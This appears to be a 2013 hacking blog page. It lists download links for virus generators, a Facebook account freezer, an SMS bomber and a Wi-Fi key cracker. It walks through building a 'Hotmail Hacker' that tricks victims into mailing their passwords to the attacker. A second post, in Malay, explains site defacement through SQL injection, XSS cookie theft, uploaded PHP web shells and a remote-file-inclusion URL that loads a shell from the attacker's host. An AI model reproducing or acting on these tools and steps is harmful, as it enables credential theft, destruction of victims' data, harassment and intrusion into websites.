Sunday, 21 April 2013

WINRAR PASSWORD CRACKER



WinRAR Password Cracker is a program which cracks RAR passwords by bruteforcing them with every combination of alphabets, numbers and symbols. It also implements dictionary attack. 

Download here:

http://www.mediafire.com/download.php?zhnwywktmky

WEP/WPA CRACKING TOOL : AIRCRACK


Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Download here (Windows Users):

http://www.megaupload.com/?d=RFE87LXI

Download here (Linux Users):

http://www.megaupload.com/?d=1XPDKFUK

WIRELESS SNIFFER : KISMET


Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.  

Download here (Windows Users):

http://www.megaupload.com/?d=2RUEPA0B 

Download here (Linux Users):
 
http://www.megaupload.com/?d=ATRPIKOJ

VIRUS CREATOR



This Virus Creator is a simple one as it gives few options to infect victim's computer like format system drive, corrupt system files etc. 

Download here:  

http://www.ziddu.com/download/6953378/VirusCreatorV.65.rar.html 


Password: hackingguide

DELmE's BATCH VIRUS GENERATOR



DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more. 

Download here:  

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html 

Password: hackingguide

SONIC BAT - THE BATCH FILE VIRUS CREATOR



This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

FACEBOOK HACKING SOFTWARE : FACEBOOK FRIEND BOMBER



Facebook Friend Bomber will enable you to add new facebook profiles automatically. FaceBook is the hottest thing which has 132 Million Users. This software includes Auto Mass Gather IDs, Auto Mass Friend Request and Poker, Auto Mass Messenger and Wall Poster. Because your business will be automated, you will be free to focus on marketing, and expansion. You can do what you want, when you want, when you get ready.  

Download here: 

http://www.mediafire.com/download.php?tgw25dn1jd2

HACK FACEBOOK ACCOUNTS : FACEBOOK FREEZER



This program can freeze facebook accounts temporarily or permanently by hitting facebook with consecutive wrong login attempts. It also has a "watch the action" feature in which we can see the facebook freezing process.


Download here:

http://www.mediafire.com/download.php?hgmrizwzwjg

ANONYMOUS SURFING : GHOSTSURF PLATINUM




The ultimate IP address hider and anonymizer which include the following features:

  • Encrypts your Internet connection
  • Erases all traces of your Web surfing
  • Removes aggressive spyware
  • Prevents identity theft and credit card fraud
  • Secures confidential files
  • Eliminates online ads
Also includes Spycatcher which is an excellent anti-spyware.


Download here:  

http://www.tenebril.com/consumer/ghostsurf/ghostsurf_platinum.php

ANONYMOUS SURFING : IP ANONYMIZER



 IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc. 

Download here:

http://www.mediafire.com/download.php?hyljntmmzw

ANONYMOUS SURFING : PC MESH ANONYMOUS WEB SURFING



PC Mesh Anonymous Web Surfing is an internet utility to hide your IP address while you are browsing the web. IP address is your internet identification number which is detectable by any web site that you visit. It is fully automatic. You don't need to have any knowledge of setting up proxy connections. Just click "Autopilot" and watch. PC Mesh Anonymous Web Surfing will check your real IP address, verify a large number of proxy servers with a lightning fast speed, delete the non-functional proxies, sort them by ping, select the fastest proxy, check your IP address again and compare it with your real IP address. 

Download here:  

http://www.ziddu.com/download/7051521/paws.rar.html 

Password: hackingguide

ANONYMOUS SURFING : TOR


Tor is a very good and free anonymizer program which hides our IP address and protects our privacy. Tor prevents websites from tracking us. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It is also available as an firefox addon.


Download from TOR Official Website:

http://www.torproject.org/easy-download.html.en

PROXY FINDER




Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.


Download here:


http://www.mediafire.com/download.php?jzm2jy0zjzg

HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER


I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm

HACK THE HACKER : BIN TEXT


Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:

http://www.mediafire.com/download.php?yoeiinztzyy

BOMB MOBILE PHONE WITH SMS : BEAVER'S SMS BOMBER PRO


This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 

http://www.mediafire.com/download.php?zmd4mtbmtol

Saturday, 20 April 2013

Hacker Deface


Cara Hack Laman Web (Deface)


Ini adalah beberapa cara untuk melumpuhkan laman web yang biasa digunakan oleh hacker.

1. SQL Injection - SQLi
2. XSS - Cross Site Scripting
3. Shells
4. RFI - Remote File Inclusion
5. Dan banyak lagi.

1. SQL Injection

Pada masa ini kebanyakkan laman web seperti forum dan laman web persendirian disambungkan kepada SQL Database. Ini membantu mereka untuk menyimpan ID dan PASSWORD [ENCRYPTED] apabila pelawat mendaftar di laman web mereka.

SQL Database akan berfungsi setiap kali pelawat LOG IN ke dalam laman web mereka.

Semasa proses LOG IN, maklumat ID dan PASSWORD pengguna akan dihantar ke SQL Datebase, sekiranya maklumat yang diberikan betul maka pengguna akan LOG IN ke dalam laman web tersebut, sekiranya maklumat yang diberikan salah maka pengguna akan mendapat ERROR yang menyatakan bahawa ID dan PASSWORD pengguna adalah salah.

Sebenarnya apa yang dilakukan oleh HACKER adalah cuba untuk mengeksplotasi dan memecah masuk ke dalam pangkalan data laman web tersebut untuk mencuri maklumat laman web tersebut.

HACKING jenis adalah paling rumit untuk dilakukan.

Jika anda ingin memeriksa laman web anda terdedah kepada SQLi ataupun tidak maka anda perlu membuat perkara seperti di bawah.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

Cuma perlu tambah ' pada hujung nombor tersebut.

lamanwebanda.com/index.php?id=545'

Jika ERROR keluar maka laman web anda terdedah kepada SQLi.

Contoh Error :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

....Dan banyak lagi

-------------------------------------------------------------------------------------------------

2. XSS - Cross Site Scripting

Biasanya kebanyakkan laman web / forum akan menyediakan kotak komen yang menyokong HTML. Ini akan memberi HACKER peluang untuk meletakkan skrip yang berniat jahat di dalam artikel tersebut. Jadi apabila pengguna lain mengklik link tersebut, secara automatik cookies / sejarah internet pengguna akan dihantar kepada HACKER yang meletakkan link tersebut. Jadi HACKER akan memanipulasi cookies tersebut untuk LOG IN ke dalam laman web dan meneruskan kerja untuk deface laman web tersebut.


-------------------------------------------------------------------------------------------------


3. Shells

Ini adalah script .php yang berbahaya. Apa yang anda perlu lakukan, cari laman web yang anda boleh upload apa sahaja file contohnya :- avatars, gambar atau lain-lain. Anda upload file shells anda keatas laman web tersebut dan jika anda berjaya maka apabila anda membuka laman web tersebut, anda akan nampak seluruh akaun "FTP - File Transfer Protocol" di dalam laman web tersebut. Anda boleh mengubah/mengedit/mengupload atau mendownload apa sahaja dari laman web tersebut termasuk laman index. Ini juga dinamakan sebagai DEFACE.


-------------------------------------------------------------------------------------------------


4. RFI - Remote File Inclusion

Ini adalah cara terbaik untuk membuat deface ke atas sesuatu laman web. Ia menggunakan shells. Anda harus mengupload shell anda di laman web anda sendiri.

KOD :

lamanwebanda.com/shells.txt

jika anda menemui laman web yang terdedah kepada RFI, anda harus melakukan seperti di bawah :

lamanwebmangsa.com/index.php?page=lamanwebanda.com/shells.txt

Ini akan memberi anda akses ke atas akaun FTP laman web mangsa. Jadi anda boleh melakukan apa sahaja termasuk mendeface laman web mangsa.

Jika anda ingin memeriksa laman web anda terdedah kepada ancaman RFI ataupun tidak maka anda harus melakukan seperti di bawah ini.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

buat seperti di bawah ini :

lamanwebanda.com/index.php?id=http;//www.google.com

Sekiranya laman web google dipamerkan dalam laman web anda maka laman web anda terdedah kepada ancaman RFI.